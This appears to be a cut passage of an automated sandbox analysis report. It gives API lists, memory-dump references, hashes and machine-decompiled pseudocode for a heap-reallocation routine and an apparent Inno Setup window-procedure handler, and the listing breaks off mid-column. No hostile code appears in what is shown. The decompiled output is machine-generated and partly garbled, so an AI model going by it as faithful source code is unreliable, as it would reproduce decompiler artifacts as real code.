                                                                    0x005b83f6
                                                                    0x00000000
                                                                    0x005b83d2
                                                                    0x005b83d7
                                                                    0x005b83f8
                                                                    0x005b8400
                                                                    0x005b843a
                                                                    0x005b843c
                                                                    0x005b843c
                                                                    0x005b8402
                                                                    0x005b841b
                                                                    0x005b841d
                                                                    0x005b841d
                                                                    0x005b841b
                                                                    0x00000000
                                                                    0x005b8400
                                                                    0x005b83c8

                                                                    APIs
                                                                    • GetCapture.USER32 ref: 005B83B6
                                                                    • IsWindowUnicode.USER32(00000000), ref: 005B83F9
                                                                    • SendMessageW.USER32(00000000,-0000BBEE,00000000,00000000), ref: 005B8414
                                                                    • SendMessageA.USER32(00000000,-0000BBEE,00000000,00000000), ref: 005B8433
                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 005B8442
                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 005B8453
                                                                    • SendMessageW.USER32(00000000,-0000BBEE,00000000,00000000), ref: 005B8473
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: MessageSendWindow$ProcessThread$CaptureUnicode
                                                                    • String ID:
                                                                    • API String ID: 1994056952-0
                                                                    • Opcode ID: 55dc5321dd5b36b01ea5e2a5a29a5f1f208dbc338f676538c3849fa0211c3caa
                                                                    • Instruction ID: fa2d834c3aada0f77e9407d785ac3e39b975c7e98aa55159218471e4f58a832a
                                                                    • Opcode Fuzzy Hash: 55dc5321dd5b36b01ea5e2a5a29a5f1f208dbc338f676538c3849fa0211c3caa
                                                                    • Instruction Fuzzy Hash: 3C21BFB520460A6F9A60EA99CD40EE777DCFF44744B105829B999C3642DE14F840C765
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00405F80, Relevance: 10.9, APIs: 7, Instructions: 406COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 88%
                                                                    			E00405F80(signed int __eax, intOrPtr __edx, void* __edi) {
				signed int __ebx;
				void* __esi;
				signed int _t69;
				signed int _t78;
				signed int _t93;
				long _t94;
				void* _t100;
				signed int _t102;
				signed int _t109;
				signed int _t115;
				signed int _t123;
				signed int _t129;
				void* _t131;
				signed int _t140;
				unsigned int _t148;
				signed int _t150;
				long _t152;
				signed int _t156;
				intOrPtr _t161;
				signed int _t166;
				signed int _t170;
				unsigned int _t171;
				intOrPtr _t174;
				intOrPtr _t192;
				signed int _t195;
				signed int _t196;
				signed int _t197;
				void* _t205;
				unsigned int _t207;
				intOrPtr _t213;
				void* _t225;
				intOrPtr _t227;
				void* _t228;
				signed int _t230;
				void* _t232;
				signed int _t233;
				signed int _t234;
				signed int _t238;
				signed int _t241;
				void* _t243;
				intOrPtr* _t244;

				_t176 = __edx;
				_t66 = __eax;
				_t166 =  *(__eax - 4);
				_t217 = __eax;
				if((_t166 & 0x00000007) != 0) {
					__eflags = _t166 & 0x00000005;
					if((_t166 & 0x00000005) != 0) {
						_pop(_t217);
						_pop(_t145);
						__eflags = _t166 & 0x00000003;
						if((_t166 & 0x00000003) == 0) {
							_push(_t145);
							_push(__eax);
							_push(__edi);
							_push(_t225);
							_t244 = _t243 + 0xffffffe0;
							_t218 = __edx;
							_t202 = __eax;
							_t69 =  *(__eax - 4);
							_t148 = (0xfffffff0 & _t69) - 0x14;
							if(0xfffffff0 >= __edx) {
								__eflags = __edx - _t148 >> 1;
								if(__edx < _t148 >> 1) {
									_t150 = E00405A04(__edx);
									__eflags = _t150;
									if(_t150 != 0) {
										__eflags = _t218 - 0x40a2c;
										if(_t218 > 0x40a2c) {
											_t78 = _t202 - 0x10;
											__eflags = _t78;
											 *((intOrPtr*)(_t78 + 8)) = _t218;
										}
										E004055C0(_t202, _t218, _t150);
										E00405D88(_t202, _t202, _t225);
									}
								} else {
									_t150 = __eax;
									 *((intOrPtr*)(__eax - 0x10 + 8)) = __edx;
								}
							} else {
								if(0xfffffff0 <= __edx) {
									_t227 = __edx;
								} else {
									_t227 = 0xbadb9d;
								}
								 *_t244 = _t202 - 0x10 + (_t69 & 0xfffffff0);
								VirtualQuery( *(_t244 + 8), _t244 + 8, 0x1c);
								if( *((intOrPtr*)(_t244 + 0x14)) != 0x10000) {
									L12:
									_t150 = E00405A04(_t227);
									__eflags = _t150;
									if(_t150 != 0) {
										__eflags = _t227 - 0x40a2c;
										if(_t227 > 0x40a2c) {
											_t93 = _t150 - 0x10;
											__eflags = _t93;
											 *((intOrPtr*)(_t93 + 8)) = _t218;
										}
										E00405590(_t202,  *((intOrPtr*)(_t202 - 0x10 + 8)), _t150);
										E00405D88(_t202, _t202, _t227);
									}
								} else {
									 *(_t244 + 0x10) =  *(_t244 + 0x10) & 0xffff0000;
									_t94 =  *(_t244 + 0x10);
									if(_t218 - _t148 >= _t94) {
										goto L12;
									} else {
										_t152 = _t227 - _t148 + 0x00010000 - 0x00000001 & 0xffff0000;
										if(_t94 < _t152) {
											_t152 = _t94;
										}
										if(VirtualAlloc( *(_t244 + 0xc), _t152, 0x2000, 4) == 0 || VirtualAlloc( *(_t244 + 0xc), _t152, 0x1000, 4) == 0) {
											goto L12;
										} else {
											_t100 = _t202 - 0x10;
											 *((intOrPtr*)(_t100 + 8)) = _t218;
											 *(_t100 + 0xc) = _t152 +  *(_t100 + 0xc) | 0x00000008;
											_t150 = _t202;
										}
									}
								}
							}
							return _t150;
						} else {
							__eflags = 0;
							return 0;
						}
					} else {
						_t170 = _t166 & 0xfffffff0;
						_push(__edi);
						_t205 = _t170 + __eax;
						_t171 = _t170 - 4;
						_t156 = _t166 & 0x0000000f;
						__eflags = __edx - _t171;
						_push(_t225);
						if(__edx > _t171) {
							_t102 =  *(_t205 - 4);
							__eflags = _t102 & 0x00000001;
							if((_t102 & 0x00000001) == 0) {
								L75:
								asm("adc edi, 0xffffffff");
								_t228 = ((_t171 >> 0x00000002) + _t171 - _t176 & 0) + _t176;
								_t207 = _t171;
								_t109 = E00405A04(((_t171 >> 0x00000002) + _t171 - _t176 & 0) + _t176);
								_t192 = _t176;
								__eflags = _t109;
								if(_t109 == 0) {
									goto L73;
								} else {
									__eflags = _t228 - 0x40a2c;
									if(_t228 > 0x40a2c) {
										 *((intOrPtr*)(_t109 - 8)) = _t192;
									}
									_t230 = _t109;
									E00405590(_t217, _t207, _t109);
									E00405D88(_t217, _t207, _t230);
									return _t230;
								}
							} else {
								_t115 = _t102 & 0xfffffff0;
								_t232 = _t171 + _t115;
								__eflags = __edx - _t232;
								if(__edx > _t232) {
									goto L75;
								} else {
									__eflags =  *0x6cf05d;
									if(__eflags == 0) {
										L66:
										__eflags = _t115 - 0xb30;
										if(_t115 >= 0xb30) {
											E004055DC(_t205);
											_t176 = _t176;
											_t171 = _t171;
										}
										asm("adc edi, 0xffffffff");
										_t123 = (_t176 + ((_t171 >> 0x00000002) + _t171 - _t176 & 0) + 0x000000d3 & 0xffffff00) + 0x30;
										_t195 = _t232 + 4 - _t123;
										__eflags = _t195;
										if(_t195 > 0) {
											 *(_t217 + _t232 - 4) = _t195;
											 *((intOrPtr*)(_t217 - 4 + _t123)) = _t195 + 3;
											_t233 = _t123;
											__eflags = _t195 - 0xb30;
											if(_t195 >= 0xb30) {
												__eflags = _t123 + _t217;
												E0040561C(_t123 + _t217, _t171, _t195);
											}
										} else {
											 *(_t217 + _t232) =  *(_t217 + _t232) & 0xfffffff7;
											_t233 = _t232 + 4;
										}
										_t234 = _t233 | _t156;
										__eflags = _t234;
										 *(_t217 - 4) = _t234;
										 *0x6cfaec = 0;
										_t109 = _t217;
										L73:
										return _t109;
									} else {
										while(1) {
											asm("lock cmpxchg [0x6cfaec], ah");
											if(__eflags == 0) {
												break;
											}
											asm("pause");
											__eflags =  *0x6cf98d;
											if(__eflags != 0) {
												continue;
											} else {
												Sleep(0);
												_t176 = _t176;
												_t171 = _t171;
												asm("lock cmpxchg [0x6cfaec], ah");
												if(__eflags != 0) {
													Sleep(0xa);
													_t176 = _t176;
													_t171 = _t171;
													continue;
												}
											}
											break;
										}
										_t156 = 0x0000000f &  *(_t217 - 4);
										_t129 =  *(_t205 - 4);
										__eflags = _t129 & 0x00000001;
										if((_t129 & 0x00000001) == 0) {
											L74:
											 *0x6cfaec = 0;
											goto L75;
										} else {
											_t115 = _t129 & 0xfffffff0;
											_t232 = _t171 + _t115;
											__eflags = _t176 - _t232;
											if(_t176 > _t232) {
												goto L74;
											} else {
												goto L66;
											}
										}
									}
								}
							}
						} else {
							__eflags = __edx + __edx - _t171;
							if(__edx + __edx < _t171) {
								__eflags = __edx - 0xb2c;
								if(__edx >= 0xb2c) {
									L41:
									_t32 = _t176 + 0xd3; // 0xbff
									_t238 = (_t32 & 0xffffff00) + 0x30;
									_t174 = _t171 + 4 - _t238;
									__eflags =  *0x6cf05d;
									if(__eflags != 0) {
										while(1) {
											asm("lock cmpxchg [0x6cfaec], ah");
											if(__eflags == 0) {
												break;
											}
											asm("pause");
											__eflags =  *0x6cf98d;
											if(__eflags != 0) {
												continue;
											} else {
												Sleep(0);
												_t174 = _t174;
												asm("lock cmpxchg [0x6cfaec], ah");
												if(__eflags != 0) {
													Sleep(0xa);
													_t174 = _t174;
													continue;
												}
											}
											break;
										}
										_t156 = 0x0000000f &  *(_t217 - 4);
										__eflags = 0xf;
									}
									 *(_t217 - 4) = _t156 | _t238;
									_t161 = _t174;
									_t196 =  *(_t205 - 4);
									__eflags = _t196 & 0x00000001;
									if((_t196 & 0x00000001) != 0) {
										_t131 = _t205;
										_t197 = _t196 & 0xfffffff0;
										_t161 = _t161 + _t197;
										_t205 = _t205 + _t197;
										__eflags = _t197 - 0xb30;
										if(_t197 >= 0xb30) {
											E004055DC(_t131);
										}
									} else {
										 *(_t205 - 4) = _t196 | 0x00000008;
									}
									 *((intOrPtr*)(_t205 - 8)) = _t161;
									 *((intOrPtr*)(_t217 + _t238 - 4)) = _t161 + 3;
									__eflags = _t161 - 0xb30;
									if(_t161 >= 0xb30) {
										E0040561C(_t217 + _t238, _t174, _t161);
									}
									 *0x6cfaec = 0;
									return _t217;
								} else {
									__eflags = __edx - 0x2cc;
									if(__edx < 0x2cc) {
										_t213 = __edx;
										_t140 = E00405A04(__edx);
										__eflags = _t140;
										if(_t140 != 0) {
											_t241 = _t140;
											E004055C0(_t217, _t213, _t140);
											E00405D88(_t217, _t213, _t241);
											_t140 = _t241;
										}
										return _t140;
									} else {
										_t176 = 0xb2c;
										__eflags = _t171 - 0xb2c;
										if(_t171 <= 0xb2c) {
											goto L37;
										} else {
											goto L41;
										}
									}
								}
							} else {
								L37:
								return _t66;
							}
						}
					}
				} else {
					__ebx =  *__ecx;
					__ecx =  *(__ebx + 2) & 0x0000ffff;
					__ecx = ( *(__ebx + 2) & 0x0000ffff) - 4;
					__eflags = __ecx - __edx;
					if(__ecx < __edx) {
						__ecx = __ecx + __ecx + 0x20;
						_push(__edi);
						__edi = __edx;
						__eax = 0;
						__ecx = __ecx - __edx;
						asm("adc eax, 0xffffffff");
						__eax = 0 & __ecx;
						__eax = (0 & __ecx) + __edx;
						__eax = E00405A04((0 & __ecx) + __edx);
						__eflags = __eax;
						if(__eax != 0) {
							__eflags = __edi - 0x40a2c;
							if(__edi > 0x40a2c) {
								 *(__eax - 8) = __edi;
							}
							 *(__ebx + 2) & 0x0000ffff = ( *(__ebx + 2) & 0x0000ffff) - 4;
							__eflags = ( *(__ebx + 2) & 0x0000ffff) - 4;
							__edx = __eax;
							__edi = __eax;
							 *((intOrPtr*)(__ebx + 0x1c))() = E00405D88(__esi, __edi, __ebp);
							__eax = __edi;
						}
						_pop(__edi);
						_pop(__esi);
						_pop(__ebx);
						return __eax;
					} else {
						__ebx = 0x40 + __edx * 4;
						__eflags = 0x40 + __edx * 4 - __ecx;
						if(0x40 + __edx * 4 < __ecx) {
							__ebx = __edx;
							__eax = __edx;
							__eax = E00405A04(__edx);
							__eflags = __eax;
							if(__eax != 0) {
								__ecx = __ebx;
								__edx = __eax;
								__ebx = __eax;
								__esi = E00405D88(__esi, __edi, __ebp);
								__eax = __ebx;
							}
							_pop(__esi);
							_pop(__ebx);
							return __eax;
						} else {
							_pop(__esi);
							_pop(__ebx);
							return __eax;
						}
					}
				}
			}












































                                                                    0x00405f80
                                                                    0x00405f80
                                                                    0x00405f80
                                                                    0x00405f88
                                                                    0x00405f8a
                                                                    0x00406018
                                                                    0x0040601b
                                                                    0x00406288
                                                                    0x00406289
                                                                    0x0040628a
                                                                    0x0040628d
                                                                    0x004058b8
                                                                    0x004058b9
                                                                    0x004058ba
                                                                    0x004058bb
                                                                    0x004058bc
                                                                    0x004058bf
                                                                    0x004058c1
                                                                    0x004058c8
                                                                    0x004058d1
                                                                    0x004058d6
                                                                    0x004059bd
                                                                    0x004059bf
                                                                    0x004059d2
                                                                    0x004059d4
                                                                    0x004059d6
                                                                    0x004059d8
                                                                    0x004059de
                                                                    0x004059e2
                                                                    0x004059e2
                                                                    0x004059e5
                                                                    0x004059e5
                                                                    0x004059ee
                                                                    0x004059f5
                                                                    0x004059f5
                                                                    0x004059c1
                                                                    0x004059c1
                                                                    0x004059c6
                                                                    0x004059c6
                                                                    0x004058dc
                                                                    0x004058e5
                                                                    0x004058eb
                                                                    0x004058e7
                                                                    0x004058e7
                                                                    0x004058e7
                                                                    0x004058f7
                                                                    0x00405906
                                                                    0x00405913
                                                                    0x00405983
                                                                    0x0040598a
                                                                    0x0040598c
                                                                    0x0040598e
                                                                    0x00405990
                                                                    0x00405996
                                                                    0x0040599a
                                                                    0x0040599a
                                                                    0x0040599d
                                                                    0x0040599d
                                                                    0x004059ad
                                                                    0x004059b4
                                                                    0x004059b4
                                                                    0x00405915
                                                                    0x00405915
                                                                    0x00405921
                                                                    0x00405927
                                                                    0x00000000
                                                                    0x00405929
                                                                    0x0040593a
                                                                    0x0040593e
                                                                    0x00405940
                                                                    0x00405940
                                                                    0x00405956
                                                                    0x00000000
                                                                    0x0040596e
                                                                    0x00405970
                                                                    0x00405973
                                                                    0x0040597c
                                                                    0x0040597f
                                                                    0x0040597f
                                                                    0x00405956
                                                                    0x00405927
                                                                    0x00405913
                                                                    0x00405a03
                                                                    0x00406293
                                                                    0x00406293
                                                                    0x00406295
                                                                    0x00406295
                                                                    0x00406021
                                                                    0x00406023
                                                                    0x00406026
                                                                    0x00406027
                                                                    0x0040602a
                                                                    0x0040602d
                                                                    0x00406030
                                                                    0x00406032
                                                                    0x00406033
                                                                    0x00406148
                                                                    0x0040614b
                                                                    0x0040614d
                                                                    0x00406240
                                                                    0x0040624b
                                                                    0x00406252
                                                                    0x00406254
                                                                    0x00406257
                                                                    0x0040625c
                                                                    0x0040625d
                                                                    0x0040625f
                                                                    0x00000000
                                                                    0x00406261
                                                                    0x00406261
                                                                    0x00406267
                                                                    0x00406269
                                                                    0x00406269
                                                                    0x0040626c
                                                                    0x00406274
                                                                    0x0040627b
                                                                    0x00406286
                                                                    0x00406286
                                                                    0x00406153
                                                                    0x00406153
                                                                    0x00406156
                                                                    0x00406159
                                                                    0x0040615b
                                                                    0x00000000
                                                                    0x00406161
                                                                    0x00406161
                                                                    0x00406168
                                                                    0x004061c5
                                                                    0x004061c5
                                                                    0x004061ca
                                                                    0x004061d0
                                                                    0x004061d5
                                                                    0x004061d6
                                                                    0x004061d6
                                                                    0x004061e2
                                                                    0x004061f3
                                                                    0x004061f9
                                                                    0x004061f9
                                                                    0x004061fb
                                                                    0x00406208
                                                                    0x0040620f
                                                                    0x00406213
                                                                    0x00406215
                                                                    0x0040621b
                                                                    0x0040621d
                                                                    0x0040621f
                                                                    0x0040621f
                                                                    0x004061fd
                                                                    0x004061fd
                                                                    0x00406201
                                                                    0x00406201
                                                                    0x00406224
                                                                    0x00406224
                                                                    0x00406226
                                                                    0x00406229
                                                                    0x00406230
                                                                    0x00406232
                                                                    0x00406236
                                                                    0x0040616a
                                                                    0x0040616a
                                                                    0x0040616f
                                                                    0x00406177
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406179
                                                                    0x0040617b
                                                                    0x00406182
                                                                    0x00000000
                                                                    0x00406184
                                                                    0x00406188
                                                                    0x0040618d
                                                                    0x0040618e
                                                                    0x00406194
                                                                    0x0040619c
                                                                    0x004061a2
                                                                    0x004061a7
                                                                    0x004061a8
                                                                    0x00000000
                                                                    0x004061a8
                                                                    0x0040619c
                                                                    0x00000000
                                                                    0x00406182
                                                                    0x004061b1
                                                                    0x004061b4
                                                                    0x004061b7
                                                                    0x004061b9
                                                                    0x00406239
                                                                    0x00406239
                                                                    0x00000000
                                                                    0x004061bb
                                                                    0x004061bb
                                                                    0x004061be
                                                                    0x004061c1
                                                                    0x004061c3
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004061c3
                                                                    0x004061b9
                                                                    0x00406168
                                                                    0x0040615b
                                                                    0x00406039
                                                                    0x0040603c
                                                                    0x0040603e
                                                                    0x00406048
                                                                    0x0040604e
                                                                    0x00406065
                                                                    0x00406065
                                                                    0x00406071
                                                                    0x00406077
                                                                    0x00406079
                                                                    0x00406080
                                                                    0x00406082
                                                                    0x00406087
                                                                    0x0040608f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406091
                                                                    0x00406093
                                                                    0x0040609a
                                                                    0x00000000
                                                                    0x0040609c
                                                                    0x0040609f
                                                                    0x004060a4
                                                                    0x004060aa
                                                                    0x004060b2
                                                                    0x004060b7
                                                                    0x004060bc
                                                                    0x00000000
                                                                    0x004060bc
                                                                    0x004060b2
                                                                    0x00000000
                                                                    0x0040609a
                                                                    0x004060c5
                                                                    0x004060c5
                                                                    0x004060c5
                                                                    0x004060ca
                                                                    0x004060cd
                                                                    0x004060cf
                                                                    0x004060d2
                                                                    0x004060d5
                                                                    0x004060e0
                                                                    0x004060e2
                                                                    0x004060e5
                                                                    0x004060e7
                                                                    0x004060e9
                                                                    0x004060ef
                                                                    0x004060f1
                                                                    0x004060f1
                                                                    0x004060d7
                                                                    0x004060da
                                                                    0x004060da
                                                                    0x004060f6
                                                                    0x004060fc
                                                                    0x00406100
                                                                    0x00406106
                                                                    0x0040610d
                                                                    0x0040610d
                                                                    0x00406112
                                                                    0x0040611f
                                                                    0x00406050
                                                                    0x00406050
                                                                    0x00406056
                                                                    0x00406120
                                                                    0x00406124
                                                                    0x00406129
                                                                    0x0040612b
                                                                    0x0040612d
                                                                    0x00406135
                                                                    0x0040613c
                                                                    0x00406141
                                                                    0x00406141
                                                                    0x00406147
                                                                    0x0040605c
                                                                    0x0040605c
                                                                    0x00406061
                                                                    0x00406063
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406063
                                                                    0x00406056
                                                                    0x00406040
                                                                    0x00406040
                                                                    0x00406044
                                                                    0x00406044
                                                                    0x0040603e
                                                                    0x00406033
                                                                    0x00405f90
                                                                    0x00405f90
                                                                    0x00405f92
                                                                    0x00405f96
                                                                    0x00405f99
                                                                    0x00405f9b
                                                                    0x00405fd4
                                                                    0x00405fd8
                                                                    0x00405fd9
                                                                    0x00405fdb
                                                                    0x00405fdd
                                                                    0x00405fdf
                                                                    0x00405fe2
                                                                    0x00405fe4
                                                                    0x00405fe6
                                                                    0x00405feb
                                                                    0x00405fed
                                                                    0x00405fef
                                                                    0x00405ff5
                                                                    0x00405ff7
                                                                    0x00405ff7
                                                                    0x00405ffe
                                                                    0x00405ffe
                                                                    0x00406001
                                                                    0x00406003
                                                                    0x0040600c
                                                                    0x00406011
                                                                    0x00406011
                                                                    0x00406013
                                                                    0x00406014
                                                                    0x00406015
                                                                    0x00406016
                                                                    0x00405f9d
                                                                    0x00405f9d
                                                                    0x00405fa4
                                                                    0x00405fa6
                                                                    0x00405fac
                                                                    0x00405fae
                                                                    0x00405fb0
                                                                    0x00405fb5
                                                                    0x00405fb7
                                                                    0x00405fb9
                                                                    0x00405fbb
                                                                    0x00405fbd
                                                                    0x00405fc8
                                                                    0x00405fcd
                                                                    0x00405fcd
                                                                    0x00405fcf
                                                                    0x00405fd0
                                                                    0x00405fd1
                                                                    0x00405fa8
                                                                    0x00405fa8
                                                                    0x00405fa9
                                                                    0x00405faa
                                                                    0x00405faa
                                                                    0x00405fa6
                                                                    0x00405f9b

                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 833c993916d0d18284627c8ebcb851e0d3f6b00a19ef6d1fc725f28c20042ba8
                                                                    • Instruction ID: 5d66737b0d4da92f98c0db807105cf356bd4b4b1c4874a50b8b8aa415a59ee3b
                                                                    • Opcode Fuzzy Hash: 833c993916d0d18284627c8ebcb851e0d3f6b00a19ef6d1fc725f28c20042ba8
                                                                    • Instruction Fuzzy Hash: D1C134A2710A004BD714AB7D9C8476FB286DBC5324F19823FE645EB3D6DA7CCC558B88
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006158C4, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 239windowCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 62%
                                                                    			E006158C4(void* __ebx, int* __edx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				char _v12;
				int* _v16;
				char _v144;
				intOrPtr _v148;
				void* _v152;
				intOrPtr _v156;
				char _v168;
				char _v172;
				void* _t51;
				intOrPtr* _t57;
				intOrPtr* _t62;
				intOrPtr* _t65;
				intOrPtr* _t71;
				intOrPtr _t77;
				void* _t104;
				void* _t107;
				int* _t108;
				struct HWND__* _t118;
				int _t122;
				intOrPtr _t152;
				intOrPtr _t156;
				intOrPtr _t157;
				intOrPtr _t162;
				struct HWND__* _t163;
				intOrPtr _t164;
				intOrPtr _t165;
				intOrPtr _t166;
				intOrPtr _t169;
				intOrPtr _t172;
				intOrPtr _t176;
				void* _t181;
				void* _t182;
				intOrPtr _t183;
				void* _t189;

				_t189 = __fp0;
				_t179 = __esi;
				_t178 = __edi;
				_t181 = _t182;
				_t183 = _t182 + 0xffffff58;
				_push(__esi);
				_push(__edi);
				_v172 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = __edx;
				_push(_t181);
				_push(0x615c7e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t183;
				_push(_t181);
				_push(0x615c40);
				_push( *[fs:edx]);
				 *[fs:edx] = _t183;
				_t122 =  *_v16;
				_t51 = _t122 - 0x4a;
				if(_t51 == 0) {
					_t53 = _v16[2];
					_t152 =  *(_v16[2]) - 0x800;
					__eflags = _t152;
					if(__eflags == 0) {
						_push(_t181);
						_push(0x615a6b);
						_push( *[fs:edx]);
						 *[fs:edx] = _t183;
						E0040A350( &_v8,  *(_t53 + 4) >> 1,  *((intOrPtr*)(_t53 + 8)), __eflags);
						_push(_t181);
						_push(0x615a29);
						_push( *[fs:eax]);
						 *[fs:eax] = _t183;
						_t57 =  *0x6cd8cc; // 0x6d681c
						 *_t57 =  *_t57 + 1;
						_push(_t181);
						_push(0x615a0e);
						_push( *[fs:eax]);
						 *[fs:eax] = _t183;
						L006ABD3C(_v8,  *(_t53 + 4) >> 1,  &_v12);
						_pop(_t156);
						 *[fs:eax] = _t156;
						_push(E00615A15);
						_t62 =  *0x6cd8cc; // 0x6d681c
						 *_t62 =  *_t62 - 1;
						__eflags =  *_t62;
						return _t62;
					} else {
						_t157 = _t152 - 1;
						__eflags = _t157;
						if(_t157 == 0) {
							_push(_t181);
							_push(0x615b61);
							_push( *[fs:edx]);
							 *[fs:edx] = _t183;
							E0040714C( *((intOrPtr*)(_t53 + 8)), _t122, 0x98,  &_v168);
							_push(_t181);
							_push(0x615b1f);
							_push( *[fs:eax]);
							 *[fs:eax] = _t183;
							_t65 =  *0x6cdb4c; // 0x6d682c
							__eflags =  *_t65;
							if( *_t65 == 0) {
								E00429008(L"Cannot evaluate variable because [Code] isn\'t running yet", 1);
								E004098C4();
							}
							E0040A998( &_v172, 0x80,  &_v144, 0);
							_t71 =  *0x6cdb4c; // 0x6d682c
							E006A3E88( *_t71, _t122, _v156, _t178, _t179, _t189,  &_v12, _v172, _v148);
							_v16[3] = 1;
							_pop(_t162);
							 *[fs:eax] = _t162;
							_t163 =  *0x6d62f8; // 0x0
							_t77 =  *0x6d62f4; // 0x0
							E005D6064(_t77, _t122, _t163, _t178, _t179, _v12);
							_pop(_t164);
							 *[fs:eax] = _t164;
						} else {
							_t169 = _t157 - 1;
							__eflags = _t169;
							if(_t169 == 0) {
								_push(_t181);
								_push(0x615bb7);
								_push( *[fs:edx]);
								 *[fs:edx] = _t183;
								E0040A1EC(0x6d62e8);
								E0040A3A4(0x6d62e8,  *(_v16[2] + 4) >> 0,  *((intOrPtr*)(_v16[2] + 8)), __eflags, 0);
								_v16[3] = 1;
								_pop(_t172);
								 *[fs:eax] = _t172;
							} else {
								__eflags = _t169 == 1;
								if(_t169 == 1) {
									_push(_t181);
									_push(0x615c0a);
									_push( *[fs:edx]);
									 *[fs:edx] = _t183;
									E0040A1EC(0x6d62ec);
									E0040A3A4(0x6d62ec,  *(_v16[2] + 4) >> 0,  *((intOrPtr*)(_v16[2] + 8)), __eflags, 0);
									_v16[3] = 1;
									_pop(_t176);
									 *[fs:eax] = _t176;
								}
							}
						}
						goto L21;
					}
				} else {
					_t104 = _t51 - 0xbb6;
					if(_t104 == 0) {
						 *0x6d62e4 = 0;
						 *0x6d62f4 = 0;
						 *0x6d62fc = 1;
						 *0x6d62fd = 0;
						PostMessageW(0, 0, 0, 0);
					} else {
						_t107 = _t104 - 1;
						if(_t107 == 0) {
							 *0x6d62fc = 1;
							_t108 = _v16;
							__eflags =  *((intOrPtr*)(_t108 + 4)) - 1;
							 *0x6d62fd =  *((intOrPtr*)(_t108 + 4)) == 1;
							PostMessageW(0, 0, 0, 0);
						} else {
							if(_t107 == 2) {
								SetForegroundWindow(_v16[1]);
							} else {
								_t118 =  *0x6d62f8; // 0x0
								_v16[3] = DefWindowProcW(_t118, _t122, _v16[1], _v16[2]);
							}
						}
					}
					L21:
					_pop(_t165);
					 *[fs:eax] = _t165;
					_pop(_t166);
					 *[fs:eax] = _t166;
					_push(E00615C85);
					E0040A1EC( &_v172);
					return E0040A228( &_v12, 2);
				}
			}






































                                                                    0x006158c4
                                                                    0x006158c4
                                                                    0x006158c4
                                                                    0x006158c5
                                                                    0x006158c7
                                                                    0x006158ce
                                                                    0x006158cf
                                                                    0x006158d2
                                                                    0x006158d8
                                                                    0x006158db
                                                                    0x006158de
                                                                    0x006158e3
                                                                    0x006158e4
                                                                    0x006158e9
                                                                    0x006158ec
                                                                    0x006158f1
                                                                    0x006158f2
                                                                    0x006158f7
                                                                    0x006158fa
                                                                    0x00615900
                                                                    0x00615904
                                                                    0x00615907
                                                                    0x00615986
                                                                    0x0061598b
                                                                    0x0061598b
                                                                    0x00615991
                                                                    0x006159af
                                                                    0x006159b0
                                                                    0x006159b5
                                                                    0x006159b8
                                                                    0x006159c6
                                                                    0x006159cd
                                                                    0x006159ce
                                                                    0x006159d3
                                                                    0x006159d6
                                                                    0x006159d9
                                                                    0x006159de
